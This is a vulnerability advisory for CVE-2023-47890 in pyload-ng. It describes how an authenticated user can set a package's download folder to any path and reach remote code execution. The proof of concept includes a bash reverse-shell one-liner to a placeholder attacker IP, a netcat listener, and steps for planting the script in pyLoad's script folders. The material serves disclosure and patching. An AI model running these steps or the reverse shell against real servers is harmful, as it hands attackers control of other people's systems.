GHSA-h73m-pcfw-25h2
Suggest an improvement- Source
- https://github.com/advisories/GHSA-h73m-pcfw-25h2
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-h73m-pcfw-25h2/GHSA-h73m-pcfw-25h2.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-h73m-pcfw-25h2
- Aliases
-
- CVE-2023-47890
- Published
- 2023-11-21T22:19:10Z
- Modified
- 2026-05-04T08:46:01.614134429Z
- Severity
-
- 7.6 (High) CVSS_V3 - CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
- Summary
- Download to arbitrary folder can lead to RCE
- Details
-
Summary
A web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts.
Details
When a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a filter is applied to make sure it can't traverse directories and stays within /downloads.
src/pyload/core/api/init.py::add_package::L432
folder = ( folder.replace("http://", "") .replace("https://", "") .replace(":", "") .replace("/", "_") .replace("\\", "_") )So if a package were created with the name
"../"the application would instead create the folder"/downloads/.._/"However, when editing packages there is no prevention in place and a user can just pick any arbitrary directory in the filesystem.
src/pyload/webui/app/blueprints/jsonblueprint.py::editpackage::L195
id = int(flask.request.form["pack_id"]) data = { "name": flask.request.form["pack_name"], "_folder": flask.request.form["pack_folder"], "password": flask.request.form["pack_pws"], } api.set_package_data(id, data)Steps to reproduce
- Login to a pyLoad instance
- Go to "Queue" and create a new package with any name and a valid link
- Click "Edit Package" on the newly created package and set the folder as "/config/scripts/download_finished/"
- Restart the package
- Check the server filesystem and note the link was downloaded and stored inside "/config/scripts/download_finished/"
Remote code execution proof-of-concept
It is possible to use this issue to abuse scripts and gain remote control over the pyLoad server.
On attacker machine
- Start a web server hosting a malicious script
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh&1 sudo python3 -m http.server 80Start netcat listener for reverse shells
nc -vklp 9999
On pyLoad
Change pyLoad file permission settings
Change permissions of downloads: On Permission mode for downloaded files: 0744
Create a package with link pointing to the attacker
http://<attacker_ip>/evil.sh
Edit package and change folder to /config/scripts/package_deleted/
Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad
Delete any package package to trigger the script
Impact
An authenticated user can gain control over the underlying pyLoad server.
- Database specific
{ "nvd_published_at": "2024-01-08T20:15:44Z", "severity": "HIGH", "github_reviewed_at": "2023-11-21T22:19:10Z", "github_reviewed": true, "cwe_ids": [ "CWE-22" ] }- References
Affected packages
PyPI / pyload-ng
Package
- Name
- pyload-ng
- View open source insights on deps.dev
- Purl
- pkg:pypi/pyload-ng
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed0.5.0b3.dev75